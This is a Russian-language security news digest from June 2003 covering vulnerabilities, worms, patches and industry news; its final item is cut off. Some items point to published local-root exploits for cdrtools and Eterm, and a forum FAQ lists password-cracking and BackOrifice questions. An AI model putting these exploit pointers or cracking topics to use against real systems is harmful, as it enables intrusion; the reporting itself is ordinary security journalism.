Некий господин с ником bazarr сообщает о существовании возможности получения прав суперпользователя локальным пользователя при помощи утилиты traceroute, которая предназначена для отслеживания маршрута от источника к определённому IP в Интернет на основании использования протокола ICMP. Для анализа существования уязвимости был использован исходный код traceroute, выпущенный недавно разработчками дистрибутива Debian Linux после обнаружения уязвимости в функции get_origin() Карлом Ливиттом. Рассуждения носят более теоретический характер и соснованы на том, что играясь параметрами "количество проб" (флаг -q) и максимальным значением TTL (Time To Live - время жизни пакета в количестве переходов или хопов) можно всё-таки вызвать переполнение буфера массива spray[]. Хотелось бы отметить, что, судя по всему, автор использовал версию traceroute под названием traceroute-nanog. Подробности - http://archives.neohapsis.com/archives/bugtraq/2003-06/0154.html
21/06/2003 09:38 Apple приоткрыл завесу секретности над PowerPC G5.
19 июня в Сеть просочились сведения о новой линейки настольных ПК Power Mac от компании Apple. Непреднамеренным информатором стал онлайновый магазин Apple Store. Стало известно, что десктопы будут оснащены новым процессором PowerPC G5 с тактовой частотой от 1,6 ГГц. Некоторые системы будут иметь на борту два 2-гигагерцовых процессора. Кроме того, объем оперативной памяти DDR SDRAM достигнет 8 ГБ, и системы будут оборудованы 1-гигагерцовой шиной, жесткими дисками Serial ATA, графической системой AGP 8x Pro от компании ATI или Nvidia, а также тремя слотами расширения PCI или PCI-X. Также сообщается, что десктопы оснащаются тремя портами USB 2.0 ports, одним - Firewire 800 и двумя - FireWire 400, наряду с оптическими и аналоговыми аудиопортами входа/выхода. Официально компания должна представить новинки на Apple World Wide Developers Conference 23-27 июня. Источник - http://www.cnews.ru
21/06/2003 09:04 Уязвимость в Linux PAM.
Компания iDEFENSE, занимающаяся сетесвой и компьютерной безопасностью сообщает об обнаружении уязвимости в подсистеме загружаемых модулей аутентификации PAM (Pluggable Authentication Module) ОС Linux. Уязвимость присутствует в модуле pam_whell, разработанного Andrew G. Morgan. Этот модуль позволяет выполнять команду su (утилита для запуска шелла с правами другого пользователя - чаще всего используется для запуска оболчки с правами суперпользователя) пользователям, входящим в группу доверенных пользователей с полномочиями рута без пароля. Модуль использует функцию getlogin() для определения подключившегося пользователя и затем, на основании результатов сверки его имени со списком доверенных пользователей (аналог группы wheel) либо разрешает, либо запрещает становиться суперпользователем. На основании анализа исходного кода этой функции было замечено, что если опция "trust" установлена, но не установлена опция "use_uid" в конфиг-файле pam_wheel, возникает возможность у локального пользователя обмануть систему регистрации, а также получить доступ к оболочке суперпользователя без пароля. Уязвимость обнаружена в Linux-PAM 0.77. Автор модуля заметил, что сама уязвимость связана с некорректной конфигурацией, что не является дефолтовым значением. Тем не менее, в репозитарии CVS выпущена новая версия 0.78. Более подробно - http://www.idefense.com/advisory/06.16.03.txt
20/06/2003 16:07 Интервью с создателем IDA Pro.
На сайте fcenter.ru опубликовано интервью с Ильфаком Гильфановым, создателем знаменитого и самого мощного дизассемблера IDA Pro. Это легко объясняется интеллектуальностью (дизассемблер сам комментирует код и распознает стандартные библиотечные и системные функции), интерактивностью (вы в любой можете прервать процесс дизассемблирования, внести нужные изменения и потом продолжить), поддержкой собственного скриптового языка (IDC), наличием плагинов (позволяющих сэкономить десятки часов исследования) и IDA SDK. Интервью - http://www.fcenter.ru/articles.shtml?interview/6704
20/06/2003 12:15 PalmSource предложит предприятиям новую ОС.
PalmSource работает над новой операционной системой Sahara, которая должна сделать Palm OS более привлекательной для корпораций, сообщил в среду генеральный директор компании Дэвид Нейджел. Выступая на выставке CeBit America в Нью-Йорке, Нейджел сказал, что Sahara будет содержать средства для повышения безопасности, веб-браузинга, чтения документов, немедленного обмена сообщениями и электронной почты. Кроме того, Palm объявила о партнерстве с IBM, Novell и Visto с целью создания новых бизнес-программ для Palm OS. Эти шаги указывают на стремление компании и ее отделения PalmSource апеллировать к корпоративным покупателям, которые пока отказываются включать КПК в число поддерживаемых компаниями вычислительных устройств. Повышение корпоративного спроса помогло бы Palm и ее партнерам замедлить потерю доли рынка, которая уходит к конкурирующему ПО Microsoft Pocket PC. Palm находится в процессе отделения PalmSource, которая станет независимой софтверной компанией, и в то же время приобретает конкурирующего производителя аппаратуры — Handspring. Подробнее - http://www.zdnet.ru/?ID=302456
20/06/2003 12:02 XML и Unicode: опасная смесь.
Организации по стандартизации предупреждают: набор символов, позволяющий компьютерам писать на любом языке, от чешского до китайского, может заставить веб-браузеры заикаться. Unicode, публикуемый консорциумом Unicode Consortium, представляет собой стандартный набор символов для компьютеров, в котором каждому письменному знаку на любом языке присвоен определенный номер. XML (Extensible Markup Language), рекомендованный консорциумом World Wide Web Consortium (W3C) для разметки цифровых документов и создания новых языков разметки для специфических задач или отраслей, опирается на Unicode и четко отслеживает его редакции. Однако технический отчет, выпущенный Unicode Consortium — и одновременно опубликованный группой интернационализации W3C, — предупреждает авторов документов, что некоторые особенности Unicode могут нарушать работу XML-приложений, HTML-браузеров и других программ. Конфликты между Unicode и языками разметки для веба проистекают из принципиального различия в подходах, лежащих в основе набора символов и веб-стандартов. Если Unicode гарантирует взаимно-однозначное соответствие каждому символу на странице, то XML и его сородичи проявляют больше гибкости, позволяя авторам присваивать одному и тому же символу, слову или странице разные стилевые и функциональные атрибуты Подробности - http://zdnet.com.com/2100-1104_2-1017789.html
20/06/2003 11:24 Появление версии D червя Sobig.
Червь Sobig вновь появился в заголовках новостей. На этот раз Вирусная Лаборатория Panda Software обнаружила появление Sobig.D, нового варианта известного червя, способного к быстрому распространению. Как и предшественники, Sobig.D рассылает себя в электронном сообщении по всем адресам, найденным на зараженном компьютере в файлах с расширениями TXT, EML, HTM*, DBX и WAB. Для того, чтобы не оставлять следов своей деятельности, он использует собственный SMTP механизм. При выборе темы и текста сообщения для того, чтобы заставить пользователя открыть зараженный вложенный файл, используются методы «социального инжиниринга». Данные параметры выбираются из списка, ознакомиться с которым можно на веб сайте компании. Кроме того, Sobig.D способен распространяться по локальным сетям. Для этого он копирует себя в папки автозагрузки Windows на компьютеры, подключенные к той же локальной сети, что и зараженный. Наконец, Sobig.D создает несколько записей в Реестре Windows для обеспечения своей активации при каждой загрузке системы. Подробности - http://www.viruslab.ru/press/index.php?go=show&num=168
20/06/2003 11:01 HP решила предустанавливать на свои компьютеры средства против спама .
Крупнейший сборщик компьютеров, компания HP, объявила о решении предустанавливать на свои линейки настольных компьютеров HP Pavilion и Compaq Presario средства для фильтрации спама. В качестве поставщика была выбрана компания interMute, производящая программный пакет SpamSubtract, способный работать с любыми почтовыми ящиками, доступ к которым производится по протоколу POP3. На компьютеры HP будет устанавливаться облегченная версия SpamSubtract, лишенная части функциональности. Впрочем, за дополнительные 30 USD можно будет предустановить и полную версию антиспамерской программы. Источник - http://www.viruslist.ru
20/06/2003 10:35 Сайт, посвящённый секретам ОС на основе ядра Windows NT.
Довольно любопытный сайт, посвящённый серкретам операционных систем, построенных на основе ядра Win NT. Приведём описание сайта со слов автора. Если Вы знаете все (?!) секреты реестра Windows NT, то Вы знаете почти все секреты реестра Windows 2000/XP/.NET Server. Надеюсь, Вам стало легче... Этот сайт создан для тех, кто хочет уметь изменять настройки Windows для более быстрой и устойчивой работы. Для програмистов здесь (см. Введение в политики) есть информация о том, как правильно использовать понятие политики в создаваемых приложениях, чтобы достичь максимально допустимого уровня безопасности. На этом сайте рассматриваются только операционные системы на основе ядра Windows NT. Более конкретно, это Windows NT, Windows 2000, Windows XP, Windows .NET Server и Longhorn. Документы на этом сайте рассчитаны на довольно продвинутых пользователей. Здесь не описывается как открыть реестр, где он находится, как опасно править что-либо в реестре без стопроцентной уверенности в том, что потом не будет мучительно больно..., и так далее. Подобные вещи можно прочитать везде. Описание большинства мнемонических констант отсутствует, равно как и описание некоторых параметров, значение которых очевидно. Мне же хотелось описать тонкости настройки программ и самой операционной системы и предостеречь Вас от возможных ошибок, которые я сам когда то совершал, и никого рядом не было, кто бы вовремя меня остановил. Cайт - http://registry.km.ru
20/06/2003 10:03 Руководство администратора CheckPoint FireWall-1 4.1.
Как сообщил нам AndreyMVT, в Рунете появилось руководство администратора CheckPoint FireWall-1 4.1 на русском языке. Cкачать - http://www.npp-bit.ru/download/cp/doc_cpfw_4_1.zip
19/06/2003 21:04 Внимание, на сайте обновился Forum FAQ.
Обновленные вопросы: + Где найти крак/кенген? + Где достать описание к уязвимости/эксплоиту? + Где скачать такую-то прогу нахаляву? + Как взломать пароль к документу офисного приложения (Word, Excel, Access, OutLook, WordPerfect, Lotus Smartsuite, PDF, и т.д.)? + Как узнать/взломать BIOS пароль? + Где лежат пароли в NT/2k? Как их вытащить? + Где хранятся пароли от настройки autocomplete в Internet Explorer? + Где в Windows-реестре можно найти параметры(настройки) Dial-Up(конкретно интересует: телефоны и пароли)? + Где лежат пароли в *nix? Как их вытащить? + Как взломать пароль от ICQ? + Как убрать баннер из ICQ? + Где достать списки паролей, вордлисты и вордлист генераторы? + Где достать дефолтовые списки паролей для разного железа? + Как узнать свой IP? + Как скрыть свой IP когда смотришь странички? + Где достать халявный шелл? + Где достать BackOrifice, его исходники и доки к нему(можно на русском)? + Я вот тут наткнулся на диске на файл с расширением *.xxx, чо за файл то? + А где взять исходники форума, похожего на ваш, и бесплатно? + Что мне будет за хакерство? + А где вообще можно посмотреть полную версию Уголовного Кодекса? uinC Forum FAQ: http://www.uinc.ru/forum/faq.shtml
19/06/2003 21:03 Письма в редакцию...
Порой к нам в почтовый ящик сваливаются письма, которые вызывают улыбку на нашем лице... Предлагаем вашему вниманию небольшую подборочку писем в нашу "редакцию". Ознакомиться: http://www.uinc.ru/members/pisma.shtml
19/06/2003 17:32 Обновление модуля Microsoft ISM.DLL.
Майкл Ховард от имени корпорации Microsoft опбуликовал сообщение, в котором объявил, что для увеличения безопасности поддерживаемого Microsoft Вэб-сервера IIS версий 4 и 5 обновлен модуль управления паролями ISM.DLL. Помимо изменения кода, сейчас этот модуль не запускается с полномочиями SYSTEM, что, по идее, также увеличивает безопасность. Обращается внимание, что IIS5.1 и IIS6 не используют этот модуль, а пользуются обновлённой системой ASP. Тестировался на Microsoft Exchange версий 5.5 и 2000 с запущенным Outlook Web Access (OWA). Рекомендуется обновить библиотеку, если посредством IIS производится изменение паролей. Подробности - http://support.microsoft.com/?id=331834
19/06/2003 17:02 Возможность раскрытия информации в qpopper.
Marc Lafortun из ConnecTalk Inc. сообщает об уязвимости в популярном POP-3 сервере qpopper, производимом Eudora. По поведению системы в момент проведения процедуры аутентификации можно сделать вывод о наличии или отсутствии пользователя. При введении правильного имени пользователя и неверного пароля qpopper возвращает ошибку, но позволяет ввести одну или несколько команд до закрытия сессии. В случае же некорректного имени пользователя и неверного пароля сессия закрывается сразу. Уязвимость обнаружена в версиях 4.0.4 и 4.0.5. Подробнее - http://archives.neohapsis.com/archives/bugtraq/2003-06/0141.html
19/06/2003 16:37 Эксплоит локальной уязвимости Linux.
Claes Nyberg из Швеции опубликовал эксплоит локальной уязвимости в утилите cdrtools в Linux. Написан на Си. Как должно быть очевидно, после компиляции и запуска эксплоита можно локально повысить свои полномочия до суперпользователя. Эксплоит - http://archives.neohapsis.com/archives/bugtraq/2003-06/0126.html
19/06/2003 16:32 eTrust будет блокировать нежелательный контент.
В намеченном к выходу на октябрь текущего года пакете eTrust Secure Content Management от Computer Associates International Inc функции традиционной антивирусной программы будут совмещены с чуть менее традиционной функциональностью блокировки спама, нежелательных сетевых адресов и опасного кода. По утверждению Брэда Миэна (Brad Meehan), директора по продуктам Computer Associates, пользователи смогут применять одинаковые правила для фильтрации трафика, приходящего через SMTP, HTTP и FTP протоколы, и в то же время - настраивать эти правила для каждого отдельно взятого пользователя корпоративной сети. В последнее время в антивирусных продуктах западных компаний отчетливо прослеживается тренд объединения антивирусной защиты с функциями, более присущими сетевым экранам. Так, Symantec Corp и Trend Micro Inc уже тем или иным способом осуществили подобное слияние в текущих версиях своих программных пакетов. Источник - http://www.viruslist.ru
19/06/2003 16:04 Удаленное выполнение произвольного кода в Microsoft Internet Explorer
Уязвимость обнаружена в Internet Explorer в механизме обработке HTTP ошибкок. Удаленный пользователь может выполнить произвольный код в Local Zone на целевой системе. Internet Explorer поставляется с несколькими файлами, отвечающими за обработку HTTP ошибок ("Friendly HTTP error messages"). Обнаружено, что вышеупомянутая процедура разбора содержит недостаток, который может использоваться для выполнения произвольного кода сценария в Local Zone. В результате удаленный атакующий может читать произвольные локальные файлы, выполнять произвольные команды и выполнять другие, потенциально деструктивные действия. Удаленный атакующий может представить специально обработанное значение после поля #sign, которое заставит функцию записать "javascript:" URL в отображаемую ссылку. Уязвимость обнаружена в Microsoft Internet Explorer 5.5-6.0. Патчем на настоящий момент Microsoft пока не осчастливила. Подробности - http://www.SecurityLab.ru/?ID=38430
19/06/2003 15:34 Домен .UA хотят взять под контроль.
Более 60% владельцев доменных имен в Украине считают, что передача домена .UA под контроль Службы безопасности Украины (СБУ) создаст серьезную угрозу развитию украинского сегмента Сети. Об этом свидетельствуют данные исследования, проведенного в мае-июне 2003 г. интернет-службой IMENA.com.ua, регистратором доменных имен в Украине. Лишь около 7,5% опрошенных считают, что СБУ или другая силовая структура могут эффективно управлять доменом .UA. 22,3% респондентов готовы рассматривать в качестве администратора украинского домена "несиловые" государственные структуры, среди которых были упомянуты, в частности Государственный комитет связи и информатизации Украины, Государственный комитет Украины по вопросам регуляторной политики и предпринимательства (Госкомпредпринимательства), ряд других. В то же время 61,4% пользователей категорически против участия СБУ или его представителей в управлении доменом .UA. Чуть более 40% респондентов полагают, что украинский домен должен находиться в ведении негосударственной организации - объединения юридических лиц-участников рынка либо общественной организации. Кроме того, 52,9% опрошенных владельцев украинских доменных имен позитивно оценили состояние дел в домене .UA. 12,1% респондентов посчитали текущие условия регистрации и уровень цен на доменные имена с расширением .ua плохими, остальные дали нейтральную оценку либо затруднились ответить. Источник - http://www.internet.ru
19/06/2003 15:06 Вышла книга о том, как построить суперкомпьютер с помощью Linux.
Издательство "Бестселлер" при поддержке ASPLinux выпустило книгу "Как построить и использовать суперкомпьютер". Автор - Алексей Оттович Лацис, создатель серии российских суперкомпьютеров МВС-1000. Один из них входит в сотню самых мощных компьютеров в мире согласно Top500 (www.top500.org). В книге автор делится 30-летним опытом создания высокопроизводительных систем и раскрывает секреты создания недорогих кластерных решений. В качестве аппаратной платформы могут выступать самые обычные компьютеры, объединенные в сеть Ethernet. В качестве программной платформы для недорогих систем безальтернативным вариантом, по мнению автора, выступает ОС Linux. Автор высоко оценил качество дистрибутивов RedHat и ASPLinux, отметив, что для машин серии МВС-1000 "в качестве весьма полного, отвечающего привычкам разработчиков, удобного для построения достаточно "непробиваемых" систем авторизации доступа к узлам в режиме планирования процессорного ресурса, был выбран RedHat". Книга - http://www.parallel.ru/news/latcis_supercomputer.html
19/06/2003 14:59 США: уничтожим компьютеры пиратов?
Один из американских сенаторов вознамерился разработать технологию, которая позволяла бы на расстоянии уничтожать компьютеры людей, нелегально загружающих музыкальные произведения из интернета. О своей идее республиканец от штата Юта Оррин Хатч заявил во всеуслышание в ходе парламентских слушаний. И добавил, что это "может быть, единственная возможность научить людей авторскому праву". "Если существуют способы сделать это без уничтожения их машин, мы с удовольствием об этом послушаем. Если же других возможностей нет, то я всецело за уничтожение их машин", - сказал Хатч. По его словам, если компьютерный удар затронет сотни тысяч людей, интернет-сообщество поймет: это уже не шутки. Сначала, предлагает сенатор, пользователю, нелегально загружающему файлы, нужно послать предупреждение. Потом еще одно. А третий рецидив должен наказываться. Уничтожением. Впрочем, идея сенатора-композитора не нова. В прошлом году законодатель Ховард Берманпредставил законопроект, с принятием которого артисты могли бы совершать хакерские налеты на компьютеры людей, нелегально загружающих музыку из сети. Источник - http://news.bbc.co.uk/1/hi/technology/
18/06/2003 16:52 Компьютерщик-любитель изобрел "ловушку для вирусов".
Чтобы защитить свою коллекцию цифровой музыки от возможного проникновения из интернета вредоносных вирусов, не отказываясь, одновременно, от возможности выходить в Сеть, пожилой компьютерщик из Делавэра придумал и запатентовал необычный ПК "два-в-одном", который, на его взгляд, позволяет решить эту проблему. Как и большинство людей, Клод Поликар (Claude M. Policard) на работе делает совсем не то, что является его хобби - он специалист по компьютерам, обслуживающим чеки, в банковской компании. Душа же его всецело принадлежит музыке - г-н Поликар играет на фортепьяно и синтезаторе, выступает в роли диск-жокея на вечеринках. И еще он собирает на своем компьютере коллекцию цифровой музыки. Несколько лет назад неожиданно пришедшая в голову мысль позволила ему соединить полезное с приятным. Компанию его поразил зловредный компьютерный вирус, и г-н Поликар до сих пор вспоминает, как он был доволен тем, что не приходится заботиться хотя бы о домашнем компьютере, который нельзя заразить всякой напастью, пришедшей с письмом по электронной почте. "Дома у меня два компьютера, - говорит 65-летний г-н Поликар, который сейчас живет в г. Ньюарк, штат Делавэр. - Один у сестры, другой у меня. На своем я храню исключительно музыку, так что о вирусах на нем беспокоиться не приходится. И вот пришла мне в голову мысль -почему бы не объединить два компьютера, разместив их в одном корпусе?" Подробнее - http://www.cnews.ru/newtop/index.shtml?2003/06/18/145373
17/06/2003 17:14 Маразм крепчал...
Производитель операционной системы семейства Unix компания SCO Group предъявила новые претензии в ходе судебного иска против IBM, поданного в марте, сообщает Reuters. Руководство дислоцирующейся в штате Юта фирмы потребовало от IBM прекращения использования и распространения ОС AIX семейства Unix. Поводом для нового заявления SCO Group стал отказ IBM выполнить прежнее условие судебного разбирательства до минувшей пятницы - IBM должна была дать объяснения в связи с незаконным использованием компонентов программного обеспечения SCO Group в свободно распространяемой системе Linux. При этом программные коды у SCO IBM покупала для создания версии AIX. Представители IBM не преминули дать скорый ответ на заявление своих оппонентов: "Мы как всегда утверждали, наша лицензия не может быть ликвидирована и будет действовать вечно". В связи с этим, SCO Group не может требовать запрещения использования системы AIX, отметил пресс-секретарь IBM Тринк Гуарино. Ка говорилось в старом анекдоте: "Маугли кого-угодно достанет" (прим. от себя). Подробности - http://www.cnn.com/2003/TECH/biztech/06/16/sco.lawsuit.reut/index.html
17/06/2003 16:16 Выход новой версии LILO.
Вышла новая версия LILO (LInux LOader) - мультеоперацинного зарузчика, позволяющего загружать (путём изменения загрузочной записи диска - MBR) многие операционные системы. Необходимо отметить, что в крайних версиях Linux на смену ему приходит зарузчик GRUB. О новости сообщил не знамо кто - потому как имени своего не указал. Версия текущего LILO - 22.5.5. Подробности - http://home.san.rr.com/johninsd/pub/linux/lilo/
17/06/2003 16:14 eTrust будет блокировать нежелательный контент.
В намеченном к выходу на октябрь текущего года пакете eTrust Secure Content Management от Computer Associates International Inc функции традиционной антивирусной программы будут совмещены с чуть менее традиционной функциональностью блокировки спама, нежелательных сетевых адресов и опасного кода. По утверждению Брэда Миэна (Brad Meehan), директора по продуктам Computer Associates, пользователи смогут применять одинаковые правила для фильтрации трафика, приходящего через SMTP, HTTP и FTP протоколы, и в то же время - настраивать эти правила для каждого отдельно взятого пользователя корпоративной сети. В последнее время в антивирусных продуктах западных компаний отчетливо прослеживается тренд объединения антивирусной защиты с функциями, более присущими сетевым экранам. Так, Symantec Corp и Trend Micro Inc уже тем или иным способом осуществили подобное слияние в текущих версиях своих программных пакетов. Источник - http://www.viruslist.ru
16/06/2003 15:47 Новый разрушительный вирус/червь Trile.
Вирусная Лаборатория компании Panda Software обнаружила появление нового червя Trile (W32/Trile). Этот вредоносный код способен заражать файлы, а также использовать методы «социального инжиниринга» для широкого распространения. Trile попадает на компьютеры в электронном сообщении с варьирующимися параметрами, выбирая тему, текст сообщения и т.п. из имеющегося списка. Вложения всегда имеют двойное расширение, одним из которых является .bat или .pif, а другим может быть одно из следующих: .gif, .mpg, .mp3, .xls, .wav, .dat, .jpg, .htm, .txt, .mdb, .bmp или .doc. При открытии такого файла Trile рассылает себя по всем адресам из Адресной книги Outlook. Кроме того, он создает папку “C:/My Downloads”, если таковой не существует. В этой папке червь создает большое количество своих копий с завлекательными именами, такими как: Civilization 3 Full Downloader.exe, Need For Speed 5 Porsche Unleashed Patch.exe или Star Wars Starfighter ISO - Full Downloader.exe. Кроме того, Trile заражает файлы с расширением .EXE. Наконец, он создает ряд записей в Реестре Windows, имеющих отношение к действиям червя на зараженном компьютере, например, сколько сообщений он разослал. Подробности - http://www.viruslab.ru/press/index.php?go=show&num=166
16/06/2003 15:33 Пентагон разрабатывает Интернет следующего поколения.
Министерство обороны США приняло решение перейти к новому поколению Интернета, и к 2008 году принять новый интернет – протокол IPv6 в качестве стандарта для всех своих компьютерных сетей и информационных систем. Об этом в пятницу объявил ассистент секретаря департамента интеграции компьютерных и информационных сетей Джон Стенбит. По словам Стенбита, новая версия Интернета позволит в несколько раз быстрее передавать данные и улучшит систему безопасности сети. «Сегодня Интернет работает под протоколом IPv4. Новый протокол IPv6 уже получил коммерческое признание и зарекомендовал себя как наиболее безопасную систему передачи данных. Переход на IPv6 будет поэтапным. Уже ведутся разработки программного обеспечения для совместимости IPv4 и IPv6», - говорит Стенбит. Пентагон планирует начать переход информационных систем Минобороны на протокол нового поколения уже в 2005 году. В случае успешного эксперимента Минобороны полностью перейдет на IPv6 в 2008. Источник - http://www.internet.ru
16/06/2003 14:30 AOL объединила ICQ и AIM.
Как сообщает runet.ru, в AOL решили не откладывать дело интеграции в долгий ящик, - уже в очередной версии облегченной аськи появилась возможность обмена сообщениями между пользователями двух гигантских систем интернет-пейджинга. Это произошло спустя несколько месяцев после того, как AOL официально объявила о своих планах по реализации возможностей общения пользователей ICQ и AIM. Эта функция уже реализована в последней версии облегченной аськи - ICQLite build 1211 Alpha. Подробности - http://www.icq.com/alpha/icqlite/
16/06/2003 13:24 Продавцы закрытых баз данных задержаны сотрудниками ОБЭП.
Рунет пестрит предложениями купить диски с информацией из баз данных операторов сотовой связи и ГИБДД. Их распространителям не всегда удается уйти от ответственности. По информации, которую передало ИА "Росбалт", сотрудниками ОБЭП Южного административного округа столицы пресечена деятельность группировки, занимавшейся производством и распространением DVD и CD-дисков с закрытыми базами данных. В их "ассортиментный набор" входила закрытая информация ГИБДД, таможни, сотовых операторов, ОВИРов и Бюро технической инвентаризации. Задержание стало финалом истории, которая началась с банального объявления о продаже крупной партии DVD и CD-дисков, которые оказались контрафактными. В указанной задержанными продавцами трехкомнатной квартире оперативники нашли около 10 тысяч различных дисков, а также множительную технику, компьютерное оборудование и журналы учета продаваемой продукции. В квартире был задержан уроженец Брянской области Виктор Цуканов, который укзаал адрес еще одной точки по производству пиратской продукции, где были задержаны еще трое человек. Источник - http://www.rosbalt.ru
16/06/2003 12:41 802.11g стал официальным стандартом.
Институт инженеров электротехники и электроники (IEEE) официально утвердил стандарт беспроводных локальных сетей 802.11g. Его должны были принять еще в апреле, но группа Wi-Fi Alliance несколько месяцев дорабатывала окончательную спецификацию. Несмотря на задержку, многие компании уже выпустили свои карты и точки доступа с поддержкой нового стандарта - Broadcom, Cisco, Linksys, Marvell Libertas, D-Link, NetGear и Intersil. А Texas Instruments задержала продажи до выхода официального одобрения IEEE. Сейчас продукт компании - TNETW1130 - ждут уже 13 клиентов, среди которых U.S. Robotics, Alpha Networks, Samsung и Z-Com. Стандарт 802.11g, основанный на протоколе OFDM, обратно совместим c "b", работает в том же диапазоне 2,4 ГГц, но позволяет обмениваться данными на скорости 54 Мбит/с против 11. В первом квартале рынок 802.11g уже был весьма популярен: доля дохода оборудования этого стандарта, проданная клиентам из малого бизнеса и домашних офисов, составила 29% всего WLAN-рынка, - сообщила в своем докладе Dell' Oro Group. Источник - http://www.cnews.ru
16/06/2003 11:42 Выход журнала Crypto-Gram.
Вчера Bruce Schneier от имени Counterpane Internet Security, Inc. объявил о доступности в сети очередного номера ежемесячного электронного журнала Crypto-Gram. Напомним, что этот журнал посвящён освещению различных аспектов компьютерной безопасности и криптографии. Также в журнале вкратце приведены ссылки на основные новости по компьютерной безопасности за прошедший месяц. Среди основных тем выпуска: The Risks of Cyberterrorism Self-Destructing DVDs The Doghouse: BSB Utilities Security Notes from All Over: Tasers and Security Audits Expired Domains, E-Mail Addresses, and Passwords и др. Журнал - http://www.counterpane.com/crypto-gram-0306.html
16/06/2003 10:54 Эксплоит узявимости Eterm.
Неким господином под ником bazarr опубликован исходный код эксплоита, позволяющего при помощи уязвимости в Eterm (популярный эмулятор терминала из Gnome) получить локально права суперпользователя. Это возможно из-за наличия возможности переполнения буфера в коде Eterm, а также из-за установленного бита SUID. Как пишет сам автор, в некоторых дистрибутивах бит изменения пользователя установлен не на root, а на utmp - в частности в Debian. Однако, даже и получение этих прав может позволить злоумышленнику забэкдорить систему и получить доступ к важным системным данным - например, к лог-файлам (с возможность их модификации). Эксплоит - http://packetstorm.linuxsecurity.com/0306-exploits/bazarr-unsencored-episode-3.c
16/06/2003 10:30 Уязвимости в Ethereal.
Уязвимость обнаружена в популярном в мире открытых систем сниффере с GUI-интерефесом Ethereal. Timo Sirainen в результате анализа исходного кода обнаружил уязвимости в модулях обработки различных протоколов. В частности - модуле обработки протокола DCERPC обнаружена попытка разместить слишком много памяти при декодировании NDR-строки. Модуль декодировки OSI может вызвать переполнение буфера при разборе некорректных IPv4, IPv6 - заголовков. Модуль обработки SPNEGO может вызвать ошибку сегментаци памяти при обработке некорректных ASN.1 - значений. Подпрограмма tvb_get_nstringz0() некорректно обрабатывает пакеты с буфером нулевой длины. Также обнаружены ошибки в обработчиках BGP, WTP, DNS, 802.11, ISAKMP, WSP, CLNP, ISIS, RMI. Всё вышесказанное позволяет злоумышленнику в локальной сети осуществить аварийное завершение программы или даже выполнить произвольный код в системе (обычно сниффер имеет право запустить только суперпользователь). Уязвимы версии до 0.9.12 и разработчики рекомендуют обновиться до версии 0.9.13. Подробности - http://www.ethereal.com/appnotes/enpa-sa-00010.html
15/06/2003 14:15 Cтатья "Взлом и защита компьютерной сети: этапы и инструменты".
На сайте crime-research.org опубликована статья о методах и этапах взлома компьютерной сети, в которой, помимо собственно всех этапов приведён список инструментов, которые в основном применяются взломщиками, а также средств защиты и противодействия взлому. Сам процесс взлома рассмотрен вкратце, равно как и процесс защиты, но, судя по всему, автор (Койнаш А.С.) и не ставил перед собой такой задачи. Хотелось бы отметить, что основной набор инструментов как одной, так и второй стороны перечислен достаточно полно. :) Статья - http://www.crime-research.org/library/Keynash.html
15/06/2003 13:12 Настройка видеокарты от nVidia под Linux.
"Никогда не возникал вопрос, почему под Linux'ом так откровенно тормозят потрясающие демки, quake 3 и прочее, требующее более или менее приличной производительности от видеокарты, хотя на компьютере установлен не самый отсталый chipset от nVidia?.." На сайте nixp.ru опубликована статья, в которой описывается технология тонкой настройки видеокарты nVidia под ОС Linux. Cтатья - http://www.nixp.ru/cgi-bin/go.pl?q=articles;a=nvidia_linux
15/06/2003 12:09 Пятый ежегодный российский фестиваль Linux.
Сайт Linux RuNet приглашает всех желающих посетить ПЯТЫЙ ежегодный фестиваль Linux, проходящий в живописных местах Калужской области. Фестиваль будет проходить с 25-ого по 27-е июля 2003-ого года в Боровском районе Калужской области на берегу живописной речки Протвы. Количество участников фестиваля не ограничено, места под солнцем хватит всем. Обращается внимание, что организаторы фестиваля предоставят для его участников место для установки палатки, интересных собеседников, запас дров и проезд до места проведения от г. Балабаново Калужской области (Россия). Стоимость участия по нынешним меркам совершенно смешная - 100 рублей. Подробнее - http://www.lrn.ru/index.php?module=linuxfest
14/06/2003 14:58 DoS в Nokia Gateway GPRS Support Node (GGSN).
Отказ в обслуживании обнаружен в Nokia Gateway GPRS Support Node (GGSN). Удаленный пользователь может нарушить работу ядра. @stake сообщает, что GGSN содержит недостаток в выполнении TCP стека. Удаленный пользователь может послать специально сформированный пакет с TCP опцией 0xFF, через мобильный телефон, чтобы аварийно завершить работу системы, и остановить передачу данных в GPRS сети. Сообщается, что GGSN автоматически перезагрузится после аварии системы. Согласно сообщению, все операторы сотовой связи были предупреждены и сделали соответствующие обновления. Уязвимость обнаружена в Nokia Gateway GPRS Support Node (GGSN) release 1. Подробности - http://www.securitylab.ru/?ID=38322
14/06/2003 12:51 Linux для промышленной безопасности.
Компания Verano представляет программный комплекс для защиты корпоративных сетей. Продукт, получивший название Industrial Defender, предназначается для защиты систем управления заводов, электростанций и прочих промышленных предприятий. Комплекс базируется на security-enhanced Linux (SELinux), берущем свое начало в Национальной администрации по безопасности (National Security Administration, NSA) при Министерстве обороны США. В минувший вторник Verano представила широкой публике первый компонент Industrial Defender - приставку для наблюдения за сетевой активностью. Источник - linux.org.ru. Подробности - http://rss.com.com/2100-1009_3-1015389.html?type=pt&part=rss&tag=feed&subj=news
14/06/2003 12:24 Выход новой версии ядра Linux.
Объявлено о выходе новой версии ядра Linux ветки 2.4.х - 2.4.21. В то время, как добрая половина разработчиков Linux усиленно вылавливает ошибки в замороженном всеми возможными способами коде ядра 2.6, кое-кто из них все же находит силы и для поддержания текущей версии. Спустя полгода после выхода Linux 2.4.20 увидела свет и следующая версия ядра из ветви 2.4.x, Linux 2.4.21. Следует заметить, что ее финальный релиз ничем не отличается от 2.4.21-rc8. Из "новенького" можно упомянуть широкомасштабную очистку кода (code cleanup) и патч, значительно улучшающий самочувствие системы при больших дисковых нагрузках, особенно при использовании IDE. Новость взята с www.linuxcenter.ru. Подробности - http://slashdot.org/article.pl?sid=03/06/13/1530210
14/06/2003 12:02 Wired пропагандирует создание вирусов.
